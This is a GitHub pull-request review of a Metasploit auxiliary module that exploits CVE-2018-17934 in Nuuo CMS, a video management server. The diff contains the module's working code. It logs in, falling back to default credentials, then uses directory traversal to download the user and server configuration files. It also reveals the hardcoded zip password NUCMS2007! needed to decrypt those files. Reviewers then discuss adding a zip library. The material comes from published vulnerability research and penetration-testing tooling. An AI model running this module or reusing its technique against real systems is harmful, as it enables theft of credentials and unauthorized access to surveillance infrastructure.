modules/auxiliary/gather/nuuo_cms_file_download.rb

```diff
@@ -0,0 +1,102 @@
+      The two .cfg files are zip-encrypted files, but due to limitations of the Ruby ZIP modules
+      included in Metasploit, these files cannot be decrypted programmatically. The user will
+      have to open them with zip or a similar program and provide the default password "NUCMS2007!".
+      This module will either use a provided session number (which can be guessed with an auxiliary
+      module) or attempt to login using a provided username and password - it will also try the
+      default credentials if nothing is provided.
+      All versions of CMS server up to and including 3.5 are vulnerable to this attack.
+      },
+      'Author'         =>
+        [
+          'Pedro Ribeiro <pedrib@gmail.com>'         # Vulnerability discovery and Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2018-17934' ],
+          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],
+          [ 'URL', 'FULLDISC_URL_TODO' ],
+          [ 'URL', 'GITHUB_URL_TODO' ]
+
+        ],
+      'Platform'       => ['win'],
+      'Privileged'     => true,
+      'DisclosureDate'  => 'Oct 11 2018'))
+
+    register_options(
+      [
+        OptString.new('FILE', [false, 'Additional file to download, use ..\\ to traverse directories from \
+        the CMS install folder'])
+      ])
+  end
+
+
+  def run
+    login
+
+    if @session == nil
+      fail_with(Failure::Unknown, "#{peer} - Failed to login to Nuuo CMS")
+    end
+
+    cmserver = download_file('CMServer.cfg', true)
+    # Once zip extraction is working change application/zip to text/plain
+    path = store_loot("CMServer.cfg", "application/zip", datastore['RHOST'],
+                      cmserver, 'CMServer.cfg', "Nuuo CMS user configuration file")
+    print_good("#{peer} - Downloaded Nuuo CMS user configuration file to #{path}")
+
+    serverconfig = download_file('ServerConfig.cfg', true)
+    # Once zip extraction is working change application/zip to text/plain
+    path = store_loot("ServerConfig.cfg", "application/zip", datastore['RHOST'],
+                      serverconfig, 'ServerConfig.cfg', "Nuuo CMS server configuration file")
+    print_good("#{peer} - Downloaded Nuuo CMS server configuration file to #{path}")
+
+    # note that when (if) archive/zip is included in msf, the code in the Nuuo mixin needs to be changed
+    # see the download_file method for details
+    print_status("#{peer} - The user and server configuration files were stored in the loot database.")
+    print_status("#{peer} - The files are ZIP encrypted, and due to the lack of the archive/zip gem, \
+they cannot be decrypted in Metasploit.")
+    print_status("#{peer} - You will need to open them up with zip or a similar utility, and use the \
+password NUCMS2007! to unzip them.")
+    print_status("#{peer} - Annoy the Metasploit developers until this gets fixed!")
```

Comment:
The Metasploit project accepts pull requests.

Reply:
so it's ok if I submit a PR including the 'archive/zip' gem? Last time I mentioned that I was told new gems would only be included in extreme cases.

Reply:
A native Ruby solution would likely be preferred. Ideally, an update to the `Rex::Archive` library to support decryption.

Reply:
Sure but that would be pretty time consuming for a non professional developer like me, especially if there is a gem that already does it.